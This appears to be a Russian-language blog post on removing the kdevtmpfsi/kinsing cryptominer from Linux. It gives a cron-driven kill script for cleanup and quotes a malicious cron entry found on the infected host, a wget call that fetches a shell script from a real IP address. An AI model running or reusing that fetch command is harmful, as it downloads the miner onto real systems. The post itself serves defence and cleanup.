kdevtmpfsi - удаляем вирус

26.05.202210:5826.05.2022 10:58:45

kdevtmpfsi - это вирус майнер, работает на операционных системах семейства Linux

В работе вирус загружает CPU на 100%
CE7KILJb98Gei5s4EupwPYxNd9U2_vftfxlpvD7fHF4oPh7QYSvqveKMZRqVic9MaLS2mfjF3T4swMMJ-1OqrE_i.jpg

CE7KILJb98Gei5s4EupwPYxNd9U2_vftfxlpvD7fHF4oPh7QYSvqveKMZRqVic9MaLS2mfjF3T4swMMJ-1OqrE_i.jpg

Сразу оговорюсь, описанный ниже способ не решает проблему в корне, но по крайней мере не дает вирусу работать, т.к. пути проникновения вируса на текущий момент не известны.

Я пробовал удалять файл /tmp/kdevtmpfsi, создавать такой же файл, и назначать права chmod 0000, не помогает, вирус создает новые файлы добавляя к названию цифры вида /tmp/kdevtmpfsi65896556.

Пробовал определять порты через которые работает вирус и закрывать их, тоже не помогает, вирус начинает использовать другие порты.

Обнаружил в cron запись вида:

* * * * * wget -q -O - http://195.3.146.118/lr.sh

Удалил, но это тоже не помогло, видимо он запускается еще от куда-то.

Создаем новый файл в nano

nano kill.sh

Вставляем скрипт

#!/bin/bash

kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*

Этот скрипт находит вирус kdevtmpfsi, завершает процессы и удаляет его файлы.
Если запустить этот скрипт один раз вирус конечно удалиться, но через какое-то время он снова вернется, может быть через пару секунд, а может и через несколько часов.

Поэтому добавляем в cron постоянный запуск этого скрипта:

crontab -e

Добавляем строчку:

* * * * * sh {путь_к_файлу_скрипта}kill.sh > /var/log/kill.log

26.05.202210:5826.05.2022 10:58:45

Просмотров:1092 Комментариев:0 0

Помогла статья?
Поддержи автора, любой суммой.

Добавить комментарий

kdevtmpfsi - удаляем вирус

Популярные записи